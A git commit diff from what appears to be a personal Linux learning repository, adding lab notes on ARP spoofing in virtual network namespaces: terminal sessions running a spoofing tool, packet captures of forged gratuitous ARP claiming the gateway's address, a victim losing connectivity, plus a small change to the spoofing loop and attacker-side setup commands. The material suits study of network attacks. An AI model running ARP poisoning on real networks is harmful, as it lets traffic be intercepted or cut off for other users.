From: seantywork Date: Tue, 2 Sep 2025 05:18:20 +0000 (+0900) Subject: done spoof arp material X-Git-Url: https://git.feebdaed.xyz/?a=commitdiff_plain;h=e60579c3f8dd0ded91579aee5531597f4489953e;p=linuxyz.git done spoof arp material --- diff --git a/spoof-arp/2509-01.xyz.md b/spoof-arp/2509-01.xyz.md index 4287ca8..a2b15de 100644 --- a/spoof-arp/2509-01.xyz.md +++ b/spoof-arp/2509-01.xyz.md @@ -1 +1,183 @@ -# \ No newline at end of file +# +```shell + +``` + +# +```shell +thy@thy-Z370-HD3:~$ sudo ip netns exec vnet1 ip neigh +thy@thy-Z370-HD3:~$ + + +``` + +# +```shell +thy@thy-Z370-HD3:~/hack/linux/linuxyz/spoof-arp$ sudo ip netns exec vnet1 ping 11.168.0.1 +PING 11.168.0.1 (11.168.0.1) 56(84) bytes of data. +64 bytes from 11.168.0.1: icmp_seq=1 ttl=64 time=0.084 ms +64 bytes from 11.168.0.1: icmp_seq=2 ttl=64 time=0.047 ms +64 bytes from 11.168.0.1: icmp_seq=3 ttl=64 time=0.059 ms +64 bytes from 11.168.0.1: icmp_seq=4 ttl=64 time=0.050 ms +^C +--- 11.168.0.1 ping statistics --- +4 packets transmitted, 4 received, 0% packet loss, time 3072ms +rtt min/avg/max/mdev = 0.047/0.060/0.084/0.014 ms + +``` + +# + +```shell +thy@thy-Z370-HD3:~$ sudo ip netns exec vnet1 ip neigh +11.168.0.1 dev veth11 lladdr 82:59:88:10:d3:fe REACHABLE + +``` + +```shell +thy@thy-Z370-HD3:~$ sudo ip netns exec vnet1 ip neigh flush all +thy@thy-Z370-HD3:~$ sudo ip netns exec vnet1 ip neigh +thy@thy-Z370-HD3:~$ + +``` + +# + +```shell +thy@thy-Z370-HD3:~/hack/linux/linuxyz/spoof-arp$ sudo ip netns exec vnet2 ./spoof.out g +my: ifidx: 2 ip: 11.168.0.200 hw: 22 e8 90 6d 69 e5 +victim: ip: 11.168.0.2 hw: 26 08 9a c4 c6 d3 +gateway: ip: 11.168.0.1 hw: 82 59 88 10 d3 fe +spoofing? + +``` + +# + +```shell +thy@thy-Z370-HD3:~/hack/linux/linuxyz$ sudo ip netns exec vnet0 tshark -i vbr0 +[sudo] password for thy: +Running as user "root" and group "root". This could be dangerous. +Capturing on 'vbr0' + 1 0.000000000 22:e8:90:6d:69:e5 → Broadcast ARP 42 Who has 11.168.0.2? Tell 11.168.0.200 + 2 0.000037175 26:08:9a:c4:c6:d3 → 22:e8:90:6d:69:e5 ARP 42 11.168.0.2 is at 26:08:9a:c4:c6:d3 + 3 0.000059438 22:e8:90:6d:69:e5 → Broadcast ARP 42 Who has 11.168.0.1? Tell 11.168.0.200 + 4 0.000069170 82:59:88:10:d3:fe → 22:e8:90:6d:69:e5 ARP 42 11.168.0.1 is at 82:59:88:10:d3:fe + + +``` + +# + +```shell +thy@thy-Z370-HD3:~$ sudo ip netns exec vnet1 ip neigh +11.168.0.200 dev veth11 lladdr 22:e8:90:6d:69:e5 STALE +``` + +# + +```shell +thy@thy-Z370-HD3:~/hack/linux/linuxyz/spoof-arp$ sudo ip netns exec vnet2 ./spoof.out g +my: ifidx: 2 ip: 11.168.0.200 hw: 22 e8 90 6d 69 e5 +victim: ip: 11.168.0.2 hw: 26 08 9a c4 c6 d3 +gateway: ip: 11.168.0.1 hw: 82 59 88 10 d3 fe +spoofing? +gratuitous arp... +gratuitous arp... + +``` + +# +```shell +Frame 4: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface vbr0, id 0 + Section number: 1 + Interface id: 0 (vbr0) + Interface name: vbr0 + Encapsulation type: Ethernet (1) + Arrival Time: Sep 2, 2025 13:43:07.035245849 KST + UTC Arrival Time: Sep 2, 2025 04:43:07.035245849 UTC + Epoch Arrival Time: 1756788187.035245849 + [Time shift for this packet: 0.000000000 seconds] + [Time delta from previous captured frame: 5.000146902 seconds] + [Time delta from previous displayed frame: 5.000146902 seconds] + [Time since reference or first frame: 15.000502026 seconds] + Frame Number: 4 + Frame Length: 42 bytes (336 bits) + Capture Length: 42 bytes (336 bits) + [Frame is marked: False] + [Frame is ignored: False] + [Protocols in frame: eth:ethertype:arp] +Ethernet II, Src: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5), Dst: Broadcast (ff:ff:ff:ff:ff:ff) + Destination: Broadcast (ff:ff:ff:ff:ff:ff) + Address: Broadcast (ff:ff:ff:ff:ff:ff) + .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default) + .... ...1 .... .... .... .... = IG bit: Group address (multicast/broadcast) + Source: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5) + Address: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5) + .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default) + .... ...0 .... .... .... .... = IG bit: Individual address (unicast) + Type: ARP (0x0806) +Address Resolution Protocol (request/gratuitous ARP) + Hardware type: Ethernet (1) + Protocol type: IPv4 (0x0800) + Hardware size: 6 + Protocol size: 4 + Opcode: request (1) + [Is gratuitous: True] + Sender MAC address: 22:e8:90:6d:69:e5 (22:e8:90:6d:69:e5) + Sender IP address: 11.168.0.1 + Target MAC address: Broadcast (ff:ff:ff:ff:ff:ff) + Target IP address: 11.168.0.1 + +``` + +# + +```shell +thy@thy-Z370-HD3:~/hack/linux/linuxyz$ sudo ip netns exec vnet0 tshark -i vbr0 -f "icmp" +Running as user "root" and group "root". This could be dangerous. +Capturing on 'vbr0' + 1 0.000000000 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=1/256, ttl=64 + 2 0.000063576 11.168.0.1 → 11.168.0.2 ICMP 98 Echo (ping) reply id=0xa180, seq=1/256, ttl=64 (request in 1) + 3 1.019965141 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=2/512, ttl=64 + 4 2.044919873 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=3/768, ttl=64 + 5 3.067998313 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=4/1024, ttl=64 + 6 4.091929811 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=5/1280, ttl=64 + 7 5.115978551 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=6/1536, ttl=64 + 8 6.140009603 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=7/1792, ttl=64 + 9 7.163937904 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=8/2048, ttl=64 + 10 8.187997388 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=9/2304, ttl=64 + 11 9.211988746 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=10/2560, ttl=64 + 12 10.236013397 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=11/2816, ttl=64 + 13 11.260045390 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=12/3072, ttl=64 + 14 12.283941056 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=13/3328, ttl=64 + 15 13.307911841 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=14/3584, ttl=64 + 16 14.331996693 11.168.0.2 → 11.168.0.1 ICMP 98 Echo (ping) request id=0xa180, seq=15/3840, ttl=64 + + +``` + +# + +```shell +thy@thy-Z370-HD3:~/hack/linux/linuxyz/spoof-arp$ sudo ip netns exec vnet1 ping 11.168.0.1 +PING 11.168.0.1 (11.168.0.1) 56(84) bytes of data. +64 bytes from 11.168.0.1: icmp_seq=1 ttl=64 time=0.129 ms +64 bytes from 11.168.0.1: icmp_seq=34 ttl=64 time=0.169 ms +^C +--- 11.168.0.1 ping statistics --- +35 packets transmitted, 2 received, 94.2857% packet loss, time 34812ms +rtt min/avg/max/mdev = 0.129/0.149/0.169/0.020 ms + + +``` + +# + +```shell + +thy@thy-Z370-HD3:~$ sudo ip netns exec vnet1 ip neigh +11.168.0.200 dev veth11 lladdr 22:e8:90:6d:69:e5 STALE +11.168.0.1 dev veth11 FAILED + +``` \ No newline at end of file diff --git a/spoof-arp/main.c b/spoof-arp/main.c index 4f6512a..f3918d8 100644 --- a/spoof-arp/main.c +++ b/spoof-arp/main.c @@ -238,7 +238,7 @@ int main(int argc, char** argv){ do_spoof_ng(fd, myhwaddr, its_ip_be, your_ethinfo.arp_sha, your_ip_be); printf("spoofing...\n"); } - sleep(5); + sleep(1); } printf("exit\n"); diff --git a/spoof-arp/setup.sh b/spoof-arp/setup.sh index 53dfc74..77a0a0f 100755 --- a/spoof-arp/setup.sh +++ b/spoof-arp/setup.sh @@ -49,4 +49,9 @@ sudo ip netns exec vnet0 /bin/bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward" sudo ip netns exec vnet0 /bin/bash -c "echo 1 > /proc/sys/net/ipv4/conf/vbr0/arp_accept" sudo ip netns exec vnet0 /bin/bash -c "echo 1 > /proc/sys/net/ipv4/conf/veth02/arp_accept" sudo ip netns exec vnet0 /bin/bash -c "echo 1 > /proc/sys/net/ipv4/conf/veth12/arp_accept" -sudo ip netns exec vnet0 /bin/bash -c "echo 1 > /proc/sys/net/ipv4/conf/veth22/arp_accept" \ No newline at end of file +sudo ip netns exec vnet0 /bin/bash -c "echo 1 > /proc/sys/net/ipv4/conf/veth22/arp_accept" +sudo ip netns exec vnet2 /bin/bash -c "echo 0 > /proc/sys/net/ipv4/conf/veth21/send_redirects" +sudo ip netns exec vnet2 /bin/bash -c "echo 0 > /proc/sys/net/ipv4/conf/veth21/accept_redirects" +sudo ip netns exec vnet2 /bin/bash -c "echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects" +sudo ip netns exec vnet2 /bin/bash -c "echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects" +sudo ip netns exec vnet2 iptables -P FORWARD DROP \ No newline at end of file